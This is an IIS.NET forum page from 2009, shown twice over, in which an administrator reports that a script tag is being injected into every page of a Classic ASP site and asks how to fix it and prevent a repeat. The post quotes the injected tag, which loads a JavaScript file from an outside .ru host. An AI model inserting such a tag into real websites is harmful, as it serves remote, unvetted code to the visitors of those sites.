Search
Home IIS.NET Forums IIS 5 & IIS 6 Classic ASP ASP injection hack
Last post Oct 14, 2009 11:52 AM by gdw10
1 Post
Oct 14, 2009 11:52 AM|gdw10|LINK
We have two websites running on different ip addresses on the same IIS installation. Last night one of the websites began displaying the tag:
<script src=http://www.clickmeter.ru/counter.js></script>
in multiple places on every asp page. The other website is fine.
I looked at the asp code and it hasn't been touched. So the tag is being inserted as the asp is served to the user.
For a site that has the exact same problem see:
http://www.tahiti1.com/
What can I do to solve the immediate problem of the tags being inserted?
And any idea as to how this happened and how to prevent it from happening again?
Thank you.
gdw10
1 Post
ASP injection hack
Oct 14, 2009 11:52 AM|gdw10|LINK
We have two websites running on different ip addresses on the same IIS installation. Last night one of the websites began displaying the tag:
<script src=http://www.clickmeter.ru/counter.js></script>
in multiple places on every asp page. The other website is fine.
I looked at the asp code and it hasn't been touched. So the tag is being inserted as the asp is served to the user.
For a site that has the exact same problem see:
http://www.tahiti1.com/
What can I do to solve the immediate problem of the tags being inserted?
And any idea as to how this happened and how to prevent it from happening again?
Thank you.
gdw10